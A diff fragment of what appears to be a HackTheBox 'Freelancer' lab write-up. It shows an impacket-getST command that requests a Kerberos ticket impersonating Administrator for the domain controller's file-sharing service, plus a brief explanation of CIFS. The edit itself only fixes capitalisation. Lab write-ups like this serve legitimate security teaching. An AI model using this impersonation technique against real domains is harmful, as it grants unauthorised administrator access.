K-Scorpio/scorpiosec/content/en/posts/HTB-Freelancer.md

 faketime -f +5h impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate Administrator -dc-ip 10.10.11.5 freelancer.htb/KSCORPIO$:'LETSgetr00t!'
 ```

-> the SPN `cifs/dc.freelancer.htb` indicates that we want to authenticate to the file sharing service on the domain controller.
+> The SPN `cifs/dc.freelancer.htb` indicates that we want to authenticate to the file sharing service on the domain controller.
 The CIFS service is essentially an extension of the SMB protocol. _Read more about it [here](https://www.upguard.com/blog/cifs)._

 ![Kerberos ticket](/images/HTB-Freelancer/Kerberos_ticket.png)